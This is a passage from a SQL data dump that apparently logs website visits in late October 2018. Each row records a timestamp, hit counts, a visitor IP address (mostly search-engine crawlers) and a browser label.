1.68.22','chrome'),(321146,1540660783,1,1,0,0,'46.211.68.22','firefox'),(321147,1540660789,1,1,0,0,'46.229.168.154','other'),(321148,1540661138,1,1,0,0,'66.249.64.201','chrome'),(321149,1540661779,1,1,0,0,'8.29.198.26','other'),(321150,1540661799,1,1,0,0,'46.211.68.22','chrome'),(321151,1540661817,1,1,0,0,'178.154.244.29','other'),(321152,1540662104,2,2,0,0,'66.249.64.201','chrome'),(321153,1540662171,2,2,0,0,'66.249.64.195','chrome'),(321154,1540662243,4,4,0,0,'157.55.39.101','other'),(321155,1540662282,7,7,0,0,'40.77.167.137','other'),(321156,1540662288,4,4,0,0,'207.46.13.154','other'),(321157,1540662327,1,1,0,0,'178.20.153.106','firefox'),(321158,1540662345,4,4,0,0,'40.77.167.1','other'),(321159,1540662483,2,2,0,0,'66.249.64.222','chrome'),(321160,1540662553,2,2,0,0,'66.249.64.199','chrome'),(321161,1540662559,2,2,0,0,'66.249.64.218','chrome'),(321162,1540662750,1,1,0,0,'216.244.66.241','other'),(321163,1540662768,1,1,0,0,'46.211.68.22','chrome'),(321164,1540663275,1,1,0,0,'66.249.64.201','chrome'),(321165,1540663635,30,30,0,0,'5.9.66.153','other'),(321166,1540663742,1,1,0,0,'46.211.68.22','chrome'),(321167,1540664654,1,1,0,0,'46.211.68.22','chrome'),(321168,1540664743,1,1,0,0,'46.229.168.133','other'),(321169,1540664745,2,2,0,0,'46.229.168.134','other'),(321170,1540665414,1,1,0,0,'46.229.168.142','other'),(321171,1540665579,1,1,0,0,'46.211.68.22','chrome'),(321172,1540666396,1,1,0,0,'66.249.75.195','chrome'),(321173,1540666409,1,1,0,0,'66.249.75.218','chrome'),(321174,1540667722,1,1,0,0,'66.249.64.57','chrome'),(321175,1540667728,1,1,0,0,'66.249.64.40','chrome'),(321176,1540668305,1,1,0,0,'66.249.64.199','chrome'),(321177,1540668317,1,1,0,0,'66.249.64.195','chrome'),(321178,1540668340,1,1,0,0,'66.249.64.218','chrome'),(321179,1540668381,1,1,0,0,'66.249.64.222','chrome'),(321180,1540668785,2,2,0,0,'95.163.255.94','other'),(321181,1540669310,2,2,0,0,'8.29.198.26','other'),(321182,1540670570,2,2,0,0,'46.229.168.153','other'),(321183,1540671105,1,1,0,0,'66.249.64.199','chrome'),(321184,1540671121,1,1,0,0,'66.249.64.220','chrome'),(321185,1540671892,1,1,0,0,'216.244.66.241','other'),(321186,1540672611,1,1,0,0,'8.29.198.26','other'),(321187,1540672737,1,1,0,0,'40.77.167.1','other'),(321188,1540673314,1,1,0,0,'46.229.168.137','other'),(321189,1540673317,1,1,0,0,'46.229.168.147','other'),(321190,1540673573,1,1,0,0,'66.249.64.199','chrome'),(321191,1540673631,1,1,0,0,'66.249.64.218','chrome'),(321192,1540675172,1,1,0,0,'46.229.168.151','other'),(321193,1540675174,1,1,0,0,'46.229.168.133','other'),(321194,1540675362,1,1,0,0,'66.249.64.201','chrome'),(321195,1540675375,1,1,0,0,'66.249.64.218','chrome'),(321196,1540675618,1,1,0,0,'37.73.151.157','other'),(321197,1540677275,1,1,0,0,'46.229.168.138','other'),(321198,1540677277,1,1,0,0,'46.229.168.140','other'),(321199,1540678207,2,2,0,0,'46.229.168.129','other'),(321200,1540679068,1,1,0,0,'66.249.64.195','chrome'),(321201,1540679081,1,1,0,0,'66.249.64.220','chrome'),(321202,1540679721,2,2,0,0,'178.154.244.29','other'),(321203,1540679725,1,1,0,0,'37.9.113.103','other'),(321204,1540679753,1,1,0,0,'46.229.168.152','other'),(321205,1540679755,1,1,0,0,'46.229.168.147','other'),(321206,1540679792,1,1,0,0,'5.45.207.19','other'),(321207,1540680136,1,1,0,0,'40.77.167.137','other'),(321208,1540680156,1,1,0,0,'8.29.198.26','other'),(321209,1540680448,1,1,0,0,'8.29.198.27','other'),(321210,1540681265,1,1,0,0,'157.55.39.101','other'),(321211,1540681624,1,1,0,0,'207.46.13.154','other'),(321212,1540682720,1,1,0,0,'93.119.227.34','chrome'),(321213,1540682721,1,1,0,0,'93.119.227.34','other'),(321214,1540682960,2,2,0,0,'207.46.13.154','other'),(321215,1540683039,1,1,0,0,'46.229.168.133','other'),(321216,1540683041,1,1,0,0,'46.229.168.129','other'),(321217,1540683446,1,1,0,0,'8.29.198.27','other'),(321218,1540683892,1,1,0,0,'216.244.66.241','other'),(321219,1540684756,2,2,0,0,'157.55.39.101','other'),(321220,1540688437,1,1,0,0,'193.106.30.98','firefox'),(321221,1540688464,2,2,0,0,'46.229.168.140','other'),(321222,1540688467,1,1,0,0,'46.229.168.153','other'),(321223,1540689760,1,1,0,0,'46.229.168.143','other'),(321224,1540689860,1,1,0,0,'46.229.168.134','other'),(321225,1540689863,1,1,0,0,'46.229.168.142','other'),(321226,1540689890,1,1,0,0,'46.229.168.137','other'),(321227,1540689891,1,1,0,0,'46.229.168.135','other'),(321228,1540689969,2,2,0,0,'87.250.224.118','other'),(321229,1540689973,1,1,0,0,'95.108.213.4','other'),(321230,1540690712,3,3,0,0,'91.196.178.133','chrome'),(321231,1540691491,1,1,0,0,'87.110.219.209','firefox'),(321233,1540691753,1,1,0,0,'37.9.113.103','other'),(321234,1540691754,1,1,0,0,'37.9.113.20','other'),(321235,1540691937,1,1,0,0,'213.180.203.40','other'),(321237,1540692204,2,2,0,0,'18.237.62.41','chrome'),(321238,1540692259,1,1,0,0,'213.180.203.61','other'),(321240,1540692375,1,1,0,0,'87.250.224.64','other'),(321241,1540692376,3,3,0,0,'141.8.132.16','other'),(321242,1540692530,1,1,0,0,'207.46.13.154','other'),(321243,1540692591,1,1,0,0,'46.229.168.148','other'),(321244,1540692594,1,1,0,0,'46.229.168.136','other'),(321245,1540692685,1,1,0,0,'178.154.244.21','other'),(321247,1540692736,15,15,0,0,'158.69.254.103','other'),(321248,1540692798,2,2,0,0,'216.244.66.241','other'),(321249,1540689364,2,2,0,0,'66.249.64.195','chrome'),(321250,1540689365,1,1,0,0,'66.249.64.222','chrome'),(321251,1540689368,1,1,0,0,'66.249.64.199','chrome'),(321252,1540689369,1,1,0,0,'66.249.64.220','chrome'),(321253,1540689384,1,1,0,0,'66.249.64.218','chrome'),(321254,1540689683,1,1,0,0,'40.77.167.1','other'),(321255,1540690037,1,1,0,0,'46.229.168.147','other'),(321256,1540690039,1,1,0,0,'46.229.168.153','other'),(321257,1540690424,1,1,0,0,'87.250.224.65','other'),(321258,1540690809,1,1,0,0,'141.8.142.144','other'),(321260,1540691001,1,1,0,0,'8.29.198.25','other'),(321261,1540691174,1,1,0,0,'5.255.253.38','other'),(321262,1540691283,1,1,0,0,'8.29.198.27','other'),(321263,1540691541,1,1,0,0,'178.154.171.24','other'),(321265,1540691798,1,1,0,0,'213.180.203.17','other'),(321266,1540691801,1,1,0,0,'87.250.224.118','other'),(321267,1540691802,1,1,0,0,'141.8.142.38','other'),(321268,1540691998,2,2,0,0,'35.155.128.196','chrome'),(321269,1540692835,1,1,0,0,'46.229.168.135','other'),(321270,1540692837,1,1,0,0,'46.229.168.154','other'),(321271,1540693294,1,1,0,0,'95.163.255.113','other'),(321272,1540693300,1,1,0,0,'95.163.255.105','other'),(321273,1540693314,1,1,0,0,'66.249.64.195','chrome'),(321274,1540693317,1,1,0,0,'66.249.64.220','chrome'),(321275,1540693612,60,60,0,0,'89.221.215.5','other'),(321276,1540694287,1,1,0,0,'8.29.198.27','other'),(321277,1540695016,1,1,0,0,'66.249.64.199','chrome'),(321278,1540695019,1,1,0,0,'66.249.64.222','chrome'),(321279,1540695023,1,1,0,0,'180.76.15.26','other'),(321280,1540695024,1,1,0,0,'180.76.15.20','other'),(321281,1540695457,1,1,0,0,'40.77.167.74','other'),(321282,1540695639,1,1,0,0,'46.229.168.138','other'),(321283,1540695641,1,1,0,0,'46.229.168.147','other'),(321284,1540695981,1,1,0,0,'176.110.134.2','chrome'),(321285,1540696262,1,1,0,0,'178.154.244.65','other'),(321286,1540696266,1,1,0,0,'178.154.171.27','other'),(321287,1540696267,1,1,0,0,'178.154.244.49','other'),(321288,1540696942,2,2,0,0,'216.244.66.241','other'),(321289,1540697335,1,1,0,0,'157.55.39.250','other'),(321290,1540697961,1,1,0,0,'95.108.181.54','other'),(321291,1540698762,1,1,0,0,'66.249.64.59','chrome'),(321292,1540698763,1,1,0,0,'66.249.64.44','chrome'),(321293,1540699619,1,1,0,0,'66.102.9.136','chrome'),(321294,1540699621,2,2,0,0,'46.211.68.213','chrome'),(321295,1540699823,2,2,0,0,'216.244.66.241','other'),(321296,1540700893,1,1,0,0,'46.211.104.193','chrome'),(321297,1540701299,1,1,0,0,'157.55.39.250','other'),(321298,1540701814,3,3,0,0,'46.211.104.9','chrome'),(321299,1540701832,1,1,0,0,'8.29.198.26','other'),(321300,1540702044,1,1,0,0,'40.77.167.74','other'),(321301,1540702132,1,1,0,0,'8.29.198.25','other'),(321302,1540702683,1,1,0,0,'157.55.39.250','other'),(321303,1540703608,1,1,0,0,'66.249.64.61','chrome'),(321304,1540703630,1,1,0,0,'66.249.64.42','chrome'),(321305,1540704865,1,1,0,0,'216.244.66.241','other'),(321306,1540705124,1,1,0,0,'8.29.198.27','other'),(321307,1540705138,1,1,0,0,'157.55.39.250','other'),(321308,1540705412,2,2,0,0,'66.249.64.201','chrome'),(321309,1540705413,2,2,0,0,'66.249.64.220','chrome'),(321310,1540705589,1,1,0,0,'180.76.15.144','other'),(321311,1540705590,1,1,0,0,'180.76.15.157','other'),(321312,1540705782,1,1,0,0,'157.55.39.136','other'),(321313,1540706544,1,1,0,0,'46.229.168.143','other'),(321314,1540706547,1,1,0,0,'46.229.168.138','other'),(321315,1540707480,1,1,0,0,'66.249.64.201','chrome'),(321317,1540707510,2,2,0,0,'66.249.64.195','chrome'),(321318,1540707511,1,1,0,0,'66.249.64.218','chrome'),(321319,1540707672,1,1,0,0,'66.249.64.222','chrome'),(321320,1540709033,1,1,0,0,'66.249.64.199','chrome'),(321322,1540709706,1,1,0,0,'216.244.66.241','other'),(321323,1540710847,1,1,0,0,'66.249.64.201','chrome'),(321324,1540710848,1,1,0,0,'66.249.64.222','chrome'),(321325,1540712657,1,1,0,0,'8.29.198.26','other'),(321326,1540712969,1,1,0,0,'8.29.198.27','other'),(321327,1540713168,2,2,0,0,'159.224.229.31','other'),(321328,1540713199,1,1,0,0,'66.249.64.199','chrome'),(321330,1540713216,1,1,0,0,'66.249.64.195','chrome'),(321331,1540713217,1,1,0,0,'66.249.64.220','chrome'),(321332,1540713437,1,1,0,0,'5.188.210.51','chrome'),(321333,1540715134,2,2,0,0,'216.244.66.241','other'),(321334,1540715522,1,1,0,0,'157.55.39.136','other'),(321335,1540715654,1,1,0,0,'66.249.64.195','chrome'),(321336,1540715655,1,1,0,0,'66.249.64.220','chrome'),(321337,1540715963,1,1,0,0,'8.29.198.25','other'),(321338,1540716557,1,1,0,0,'66.249.64.201','chrome'),(321339,1540716753,1,1,0,0,'66.249.64.199','chrome'),(321340,1540716754,1,1,0,0,'66.249.64.222','chrome'),(321341,1540718220,1,1,0,0,'178.154.171.69','other'),(321342,1540718224,1,1,0,0,'178.154.244.29','other'),(321343,1540718439,1,1,0,0,'216.244.66.241','other'),(321344,1540718539,1,1,0,0,'66.249.64.218','chrome'),(321345,1540718543,4,4,0,0,'66.249.64.220','chrome'),(321346,1540718989,3,3,0,0,'66.249.64.222','chrome'),(321347,1540719397,1,1,0,0,'157.55.39.136','other'),(321348,1540719511,6,6,0,0,'66.249.64.218','chrome'),(321349,1540719615,4,4,0,0,'95.163.255.104','other'),(321350,1540719621,1,1,0,0,'95.163.255.102','other'),(321351,1540719626,6,6,0,0,'66.249.64.220','chrome'),(321352,1540719628,1,1,0,0,'95.163.255.106','other'),(321353,1540719645,4,4,0,0,'95.163.255.109','other'),(321354,1540719660,2,2,0,0,'95.163.255.116','other'),(321355,1540719668,2,2,0,0,'95.163.255.107','other'),(321356,1540719695,2,2,0,0,'95.163.255.114','other'),(321357,1540719705,2,2,0,0,'95.163.255.103','other'),(321358,1540719724,2,2,0,0,'95.163.255.117','other'),(321359,1540719748,1,1,0,0,'95.163.255.105','other'),(321360,1540719756,1,1,0,0,'95.163.255.112','other'),(321361,1540720248,2,2,0,0,'66.249.64.199','chrome'),(321362,1540720369,5,5,0,0,'66.249.64.222','chrome'),(321363,1540720419,1,1,0,0,'159.224.229.31','other'),(321364,1540720440,49,49,0,0,'66.249.64.218','chrome'),(321365,1540720526,1,1,0,0,'5.45.207.79','other'),(321367,1540720577,10,10,0,0,'66.249.64.220','chrome'),(321368,1540720627,1,1,0,0,'66.249.64.42','chrome'),(321369,1540720708,1,1,0,0,'46.229.168.146','other'),(321370,1540720715,1,1,0,0,'46.229.168.142','other'),(321371,1540721311,1,1,0,0,'66.249.64.44','chrome'),(321372,1540721347,1,1,0,0,'66.249.64.199','chrome'),(321373,1540721348,1,1,0,0,'66.249.64.222','chrome'),(321374,1540721740,1,1,0,0,'46.229.168.145','other'),(321375,1540721743,1,1,0,0,'46.229.168.129','other'),(321376,1540721871,1,1,0,0,'13.57.233.99','chrome'),(321377,1540721872,1,1,0,0,'46.229.168.152','other'),(321378,1540721876,1,1,0,0,'46.229.168.143','other'),(321379,1540721921,1,1,0,0,'66.249.64.42','chrome'),(321380,1540722121,1,1,0,0,'95.163.255.112','other'),(321381,1540722129,1,1,0,0,'95.163.255.118','other'),(321382,1540722299,1,1,0,0,'66.249.64.222','chrome'),(321383,1540722510,3,3,0,0,'66.249.64.40','chrome'),(321384,1540722824,3,3,0,0,'66.249.64.42','chrome'),(321385,1540723442,1,1,0,0,'40.77.167.74','other'),(321386,1540723493,1,1,0,0,'8.29.198.27','other'),(321387,1540723569,1,1,0,0,'66.249.64.195','chrome'),(321388,1540723572,1,1,0,0,'66.249.64.222','chrome'),(321389,1540723719,4,4,0,0,'66.249.64.44','chrome'),(321390,1540723809,1,1,0,0,'8.29.198.25','other'),(321391,1540723816,1,1,0,0,'40.77.167.1','other'),(321392,1540723820,2,2,0,0,'178.154.244.29','other'),(321393,1540724134,1,1,0,0,'66.249.64.218','chrome'),(321394,1540724225,4,4,0,0,'66.249.64.42','chrome'),(321395,1540724316,6,6,0,0,'66.249.64.40','chrome'),(321396,1540724624,5,5,0,0,'66.249.64.44','chrome'),(321397,1540724833,1,1,0,0,'66.249.64.220','chrome'),(321398,1540725124,2,2,0,0,'46.211.110.91','chrome'),(321399,1540725363,1,1,0,0,'54.165.59.7','other'),(321400,1540725445,4,4,0,0,'66.249.64.40','chrome'),(321401,1540726226,1,1,0,0,'46.211.110.91','chrome'),(321402,1540726288,9,9,0,0,'66.249.64.42','chrome'),(321403,1540726367,4,4,0,0,'93.74.134.24','chrome'),(321404,1540726401,4,4,0,0,'66.249.64.40','chrome'),(321405,1540726563,1,1,0,0,'66.249.64.44','chrome'),(321406,1540726810,1,1,0,0,'8.29.198.26','other'),(321407,1540726917,8,8,0,0,'144.76.14.153','other'),(321408,1540727259,68,68,0,0,'144.76.29.148','other'),(321409,1540727405,1,1,0,0,'46.211.110.91','chrome'),(321410,1540727500,1,1,0,0,'66.249.64.40','chrome'),(321411,1540727699,1,1,0,0,'66.249.64.201','chrome'),(321412,1540727700,1,1,0,0,'66.249.64.220','chrome'),(321413,1540728304,1,1,0,0,'157.55.39.136','other'),(321414,1540728332,1,1,0,0,'46.211.110.91','chrome'),(321415,1540728423,1,1,0,0,'46.229.168.151','other'),(321416,1540728425,1,1,0,0,'46.229.168.143','other'),(321417,1540728522,1,1,0,0,'216.244.66.241','other'),(321418,1540728802,1,1,0,0,'66.249.64.220','chrome'),(321419,1540729256,1,1,0,0,'46.211.110.91','chrome'),(321420,1540729675,1,1,0,0,'46.229.168.143','other'),(321421,1540729677,1,1,0,0,'46.229.168.149','other'),(321422,1540729922,1,1,0,0,'66.249.64.222','chrome'),(321423,1540730127,1,1,0,0,'66.249.64.44','chrome'),(321424,1540730213,1,1,0,0,'46.211.110.91','chrome'),(321425,1540731157,1,1,0,0,'46.211.110.91','chrome'),(321426,1540732283,1,1,0,0,'46.229.168.148','other'),(321427,1540732285,1,1,0,0,'46.229.168.141','other'),(321428,1540732481,2,2,0,0,'46.211.134.101','chrome'),(321429,1540732657,1,1,0,0,'157.55.39.136','other'),(321430,1540732904,1,1,0,0,'66.249.64.42','chrome'),(321431,1540733250,1,1,0,0,'207.46.13.160','other'),(321432,1540733485,1,1,0,0,'46.211.134.101','chrome'),(321433,1540734325,1,1,0,0,'8.29.198.26','other'),(321434,1540734640,1,1,0,0,'8.29.198.27','other'),(321435,1540735002,1,1,0,0,'46.229.168.138','other'),(321436,1540735004,1,1,0,0,'46.229.168.143','other'),(321437,1540735430,2,2,0,0,'46.211.134.101','chrome'),(321438,1540736844,1,1,0,0,'157.55.39.136','other'),(321439,1540737649,1,1,0,0,'8.29.198.27','other'),(321440,1540737669,1,1,0,0,'178.154.244.29','other'),(321441,1540737961,1,1,0,0,'216.244.66.241','other'),(321442,1540738560,1,1,0,0,'66.249.64.59','chrome'),(321443,1540738561,1,1,0,0,'66.249.64.40','chrome'),(321444,1540739099,2,2,0,0,'46.211.134.101','chrome'),(321445,1540740200,1,1,0,0,'66.249.64.199','chrome'),(321446,1540740224,1,1,0,0,'66.249.64.218','chrome'),(321447,1540741446,1,1,0,0,'196.52.43.69','other'),(321448,1540741956,1,1,0,0,'5.188.210.51','chrome'),(321449,1540742002,81,81,0,0,'95.216.6.46','other'),(321450,1540742160,1,1,0,0,'180.76.15.11','other'),(321451,1540742161,1,1,0,0,'180.76.15.146','other'),(321452,1540742904,84,84,0,0,'95.216.6.46','other'),(321453,1540743176,4,4,0,0,'216.244.66.241','other'),(321454,1540743575,2,2,0,0,'46.211.112.200','chrome'),(321455,1540743825,77,77,0,0,'95.216.6.46','other'),(321456,1540743826,1,1,0,0,'178.154.244.29','other'),(321457,1540743827,1,1,0,0,'178.154.244.11','other'),(321459,1540744182,1,1,0,0,'46.229.168.150','other'),(321460,1540744184,1,1,0,0,'46.229.168.154','other'),(321461,1540744576,1,1,0,0,'40.77.167.74','other'),(321462,1540744734,26,26,0,0,'95.216.6.46','other'),(321463,1540745166,1,1,0,0,'8.29.198.26','other'),(321464,1540745480,1,1,0,0,'8.29.198.25','other'),(321465,1540745695,2,2,0,0,'46.229.168.151','other'),(321466,1540746668,1,1,0,0,'46.229.168.150','other'),(321467,1540746672,1,1,0,0,'46.229.168.143','other'),(321468,1540746676,1,1,0,0,'40.77.167.74','other'),(321469,1540747629,1,1,0,0,'66.249.64.222','chrome'),(321470,1540747640,10,10,0,0,'66.249.64.218','chrome'),(321471,1540747753,4,4,0,0,'66.249.64.220','chrome'),(321472,1540747919,4,4,0,0,'178.92.170.101','chrome'),(321473,1540748182,1,1,0,0,'66.249.64.42','chrome'),(321474,1540748498,1,1,0,0,'8.29.198.27','other'),(321475,1540748581,1,1,0,0,'66.249.64.44','chrome'),(321476,1540748692,1,1,0,0,'80.90.55.172','other'),(321477,1540748693,1,1,0,0,'80.90.55.169','other'),(321478,1540748835,1,1,0,0,'46.229.168.130','other'),(321479,1540748837,1,1,0,0,'46.229.168.138','other'),(321480,1540748997,1,1,0,0,'66.249.64.195','chrome'),(321481,1540748998,1,1,0,0,'66.249.64.218','chrome'),(321482,1540749079,2,2,0,0,'46.211.112.200','chrome'),(321483,1540749333,1,1,0,0,'66.249.64.42','chrome'),(321484,1540749575,1,1,0,0,'46.229.168.139','other'),(321485,1540749578,1,1,0,0,'46.229.168.143','other'),(321486,1540750959,210,210,0,0,'158.69.254.103','other'),(321487,1540751126,1,1,0,0,'157.55.39.136','other'),(321488,1540751189,1,1,0,0,'66.249.64.42','chrome'),(321489,1540751346,1,1,0,0,'66.249.64.44','chrome'),(321490,1540751437,1,1,0,0,'141.8.142.103','other'),(321491,1540751441,1,1,0,0,'5.45.207.79','other'),(321492,1540752331,1,1,0,0,'157.55.39.136','other'),(321493,1540752830,1,1,0,0,'207.46.13.160','other'),(321494,1540753949,1,1,0,0,'66.249.64.201','chrome'),(321495,1540753950,1,1,0,0,'66.249.64.222','chrome'),(321496,1540754278,3,3,0,0,'185.11.29.136','other'),(321497,1540754918,1,1,0,0,'213.180.203.53','other'),(321499,1540755190,1,1,0,0,'213.180.203.61','other'),(321501,1540755311,1,1,0,0,'66.249.64.199','chrome'),(321502,1540755320,1,1,0,0,'66.249.64.195','chrome'),(321503,1540755401,2,2,0,0,'66.249.64.218','chrome'),(321504,1540755754,1,1,0,0,'66.249.64.61','chrome'),(321505,1540755777,2,1,1,0,'66.249.64.42',''),(321506,1540755801,2,2,0,0,'178.154.244.29','other'),(321507,1540755991,1,1,0,0,'8.29.198.26','other'),(321508,1540756005,1,1,0,0,'207.46.13.160','other'),(321509,1540756241,1,0,1,0,'66.249.64.59',''),(321510,1540756317,1,1,0,0,'8.29.198.27','other'),(321511,1540756336,4,4,0,0,'91.196.178.135','chrome'),(321512,1540757988,2,2,0,0,'178.154.244.29','other'),(321513,1540758096,6,6,0,0,'159.65.24.22','chrome'),(321514,1540758545,1,1,0,0,'66.249.64.40','chrome'),(321515,1540758754,1,1,0,0,'46.229.168.140','other'),(321516,1540758757,1,1,0,0,'46.229.168.143','other'),(321517,1540758863,1,1,0,0,'5.45.207.19','other'),(321518,1540759222,3,3,0,0,'178.154.244.29','other'),(321519,1540759263,1,1,0,0,'82.145.208.86','other'),(321520,1540759334,1,1,0,0,'178.154.244.11','other'),(321521,1540759337,1,1,0,0,'37.9.113.148','other'),(321523,1540759338,1,1,0,0,'8.29.198.25','other'),(321524,1540759432,3,3,0,0,'46.211.122.141','chrome'),(321525,1540759458,2,2,0,0,'216.244.66.241','other'),(321526,1540760026,1,1,0,0,'54.165.59.7','other'),(321527,1540760225,1,1,0,0,'66.249.64.59','chrome'),(321528,1540760228,1,1,0,0,'66.249.64.40','chrome'),(321529,1540760445,1,1,0,0,'95.163.255.98','other'),(321530,1540760450,1,1,0,0,'95.163.255.94','other'),(321531,1540760567,1,1,0,0,'66.249.64.57','chrome'),(321532,1540760568,1,1,0,0,'66.249.64.42','chrome'),(321533,1540761690,1,1,0,0,'46.229.168.135','other'),(321534,1540761693,1,1,0,0,'46.229.168.145','other'),(321535,1540761724,1,1,0,0,'216.244.66.241','other'),(321536,1540763089,1,1,0,0,'180.76.15.163','other'),(321537,1540763093,1,1,0,0,'180.76.15.14','other'),(321538,1540764566,1,1,0,0,'207.46.13.160','other'),(321539,1540764634,19,19,0,0,'173.208.157.186','other'),(321540,1540766818,1,1,0,0,'8.29.198.27','other'),(321541,1540767030,1,1,0,0,'216.244.66.241','other'),(321542,1540767158,1,1,0,0,'8.29.198.26','other'),(321543,1540768016,1,1,0,0,'66.249.64.195','chrome'),(321544,1540768017,1,1,0,0,'66.249.64.220','chrome'),(321545,1540768548,1,1,0,0,'66.249.64.59','chrome'),(321546,1540768550,1,1,0,0,'66.249.64.40','chrome'),(321547,1540768625,1,1,0,0,'66.249.64.42','chrome'),(321548,1540769145,2,2,0,0,'95.163.255.92','other'),(321549,1540769687,1,1,0,0,'216.244.66.241','other'),(321550,1540770180,1,1,0,0,'8.29.198.25','other'),(321551,1540771208,1,1,0,0,'207.46.13.160','other'),(321552,1540771557,1,1,0,0,'66.249.64.199','chrome'),(321553,1540771561,2,2,0,0,'66.249.64.218','chrome'),(321554,1540771751,2,2,0,0,'91.209.11.236','other'),(321555,1540771835,47,47,0,0,'176.9.146.84','other'),(321556,1540771877,2,2,0,0,'66.249.64.201','chrome'),(321557,1540771882,1,1,0,0,'66.249.64.220','chrome'),(321558,1540773664,1,1,0,0,'216.244.66.241','other'),(321559,1540773978,1,1,0,0,'66.249.64.199','chrome'),(321560,1540773979,1,1,0,0,'66.249.64.220','chrome'),(321561,1540774079,1,1,0,0,'66.249.64.201','chrome'),(321562,1540774085,1,1,0,0,'66.249.64.218','chrome'),(321563,1540774193,1,1,0,0,'46.229.168.140','other'),(321564,1540774195,1,1,0,0,'46.229.168.135','other'),(321565,1540774776,1,1,0,0,'216.244.66.241','other'),(321566,1540775744,5,5,0,0,'66.249.64.222','chrome'),(321567,1540775761,1,1,0,0,'66.249.64.40','chrome'),(321568,1540775800,3,3,0,0,'66.249.64.42','chrome'),(321569,1540775957,11,11,0,0,'66.249.64.218','chrome'),(321570,1540776136,7,7,0,0,'66.249.64.220','chrome'),(321571,1540776558,1,1,0,0,'66.249.64.44','chrome'),(321572,1540776666,3,3,0,0,'66.249.64.222','chrome'),(321573,1540776869,13,13,0,0,'66.249.64.218','chrome'),(321574,1540777192,7,7,0,0,'66.249.64.220','chrome'),(321575,1540777374,1,1,0,0,'46.229.168.134','other'),(321576,1540777377,1,1,0,0,'46.229.168.143','other'),(321577,1540777598,2,2,0,0,'66.249.64.44','chrome'),(321578,1540777648,2,2,0,0,'8.29.198.25','other'),(321579,1540777821,3,3,0,0,'66.249.64.40','chrome'),(321580,1540777851,118,118,0,0,'66.249.64.218','chrome'),(321581,1540778208,24,24,0,0,'66.249.64.220','chrome'),(321582,1540778285,1,1,0,0,'207.46.13.160','other'),(321583,1540778526,5,5,0,0,'66.249.64.222','chrome'),(321584,1540778659,2,2,0,0,'46.229.168.132','other'),(321585,1540778769,95,95,0,0,'66.249.64.218','chrome'),(321586,1540778924,2,2,0,0,'66.249.64.40','chrome'),(321587,1540779359,1,1,0,0,'66.249.64.42','chrome'),(321588,1540779387,1,1,0,0,'178.255.215.94','other'),(321589,1540779448,2,2,0,0,'216.244.66.241','other'),(321590,1540779670,3,3,0,0,'66.249.64.222','chrome'),(321591,1540779672,2,2,0,0,'66.249.64.44','chrome'),(321592,1540779688,49,49,0,0,'66.249.64.218','chrome'),(321593,1540779782,9,9,0,0,'66.249.64.220','chrome'),(321594,1540779850,17,17,0,0,'66.249.64.40','chrome'),(321595,1540779968,2,2,0,0,'178.154.244.29','other'),(321596,1540780009,1,1,0,0,'196.52.43.71','other'),(321597,1540780333,1,1,0,0,'95.163.255.107','other'),(321598,1540780334,8,8,0,0,'66.249.64.42','chrome'),(321599,1540780341,1,1,0,0,'95.163.255.119','other'),(321600,1540780628,2,2,0,0,'66.249.64.218','chrome'),(321601,1540780816,3,3,0,0,'66.249.64.220','chrome'),(321602,1540780823,7,7,0,0,'66.249.64.40','chrome'),(321603,1540780874,1,1,0,0,'66.249.64.44','chrome'),(321604,1540780987,1,1,0,0,'185.117.118.154','other'),(321605,1540781017,1,1,0,0,'8.29.198.26','other'),(321606,1540781949,2,2,0,0,'66.249.64.220','chrome'),(321607,1540782007,5,5,0,0,'66.249.64.44','chrome'),(321608,1540782020,8,8,0,0,'66.249.64.42','chrome'),(321609,1540782035,40,40,0,0,'66.249.64.40','chrome'),(321610,1540782579,1,1,0,0,'216.244.66.241','other'),(321611,1540782614,1,1,0,0,'95.163.255.97','other'),(321612,1540782617,1,1,0,0,'95.163.255.98','other'),(321613,1540782961,8,8,0,0,'66.249.64.42','chrome'),(321614,1540782992,7,7,0,0,'66.249.64.40','chrome'),(321615,1540782995,1,1,0,0,'66.249.64.220','chrome'),(321616,1540783276,3,3,0,0,'66.249.64.44','chrome'),(321617,1540783683,1,1,0,0,'66.249.64.61','chrome'),(321618,1540783868,1,1,0,0,'216.244.66.241','other'),(321619,1540783944,2,2,0,0,'35.166.34.137','chrome'),(321620,1540784012,7,7,0,0,'66.249.64.42','chrome'),(321621,1540784091,1,1,0,0,'66.249.64.195','chrome'),(321622,1540784094,1,1,0,0,'66.249.64.218','chrome'),(321623,1540784129,39,39,0,0,'66.249.64.40','chrome'),(321624,1540784238,2,2,0,0,'66.249.64.44','chrome'),(321625,1540784315,2,2,0,0,'66.249.64.220','chrome'),(321626,1540784340,2,2,0,0,'178.154.244.29','other'),(321627,1540784344,2,2,0,0,'66.249.64.222','chrome'),(321628,1540784660,3,3,0,0,'178.154.244.11','other'),(321629,1540784889,2,2,0,0,'46.211.119.237','chrome'),(321630,1540785002,7,7,0,0,'66.249.64.42','chrome'),(321631,1540785030,19,19,0,0,'66.249.64.40','chrome'),(321632,1540785056,1,1,0,0,'216.244.66.241','other'),(321633,1540785269,3,3,0,0,'178.154.244.29','other'),(321634,1540785329,1,1,0,0,'66.249.64.44','chrome'),(321635,1540785348,1,1,0,0,'95.163.255.95','other'),(321636,1540785352,1,1,0,0,'95.163.255.96','other'),(321637,1540785405,2,2,0,0,'5.45.207.79','other'),(321638,1540785757,2,2,0,0,'94.180.156.207','chrome'),(321639,1540785808,1,1,0,0,'141.8.142.103','other'),(321640,1540785870,1,1,0,0,'66.249.64.201','chrome'),(321642,1540785987,2,2,0,0,'66.249.64.42','chrome'),(321643,1540786111,1,1,0,0,'216.244.66.241','other'),(321644,1540786172,1,1,0,0,'87.250.224.47','other'),(321645,1540786173,3,3,0,0,'178.154.244.29','other'),(321646,1540786176,1,1,0,0,'5.45.207.19','other'),(321647,1540786220,1,1,0,0,'66.249.64.195','chrome'),(321649,1540786631,2,2,0,0,'178.154.244.11','other'),(321650,1540787317,1,1,0,0,'46.229.168.147','other'),(321651,1540787327,3,3,0,0,'178.154.244.29','other'),(321652,1540787410,1,1,0,0,'46.229.168.141','other'),(321653,1540787412,1,1,0,0,'46.229.168.130','other'),(321654,1540787548,1,1,0,0,'178.154.244.11','other'),(321655,1540787576,1,1,0,0,'66.249.64.222','chrome'),(321656,1540787734,1,1,0,0,'66.249.64.201','chrome'),(321657,1540787745,2,2,0,0,'66.249.64.218','chrome'),(321658,1540787836,1,1,0,0,'66.249.64.195','chrome'),(321659,1540787928,1,1,0,0,'66.249.64.57','chrome'),(321660,1540787932,1,1,0,0,'66.249.64.40','chrome'),(321661,1540788141,1,1,0,0,'46.229.168.150','other'),(321662,1540788143,1,1,0,0,'46.229.168.149','other'),(321663,1540788498,1,1,0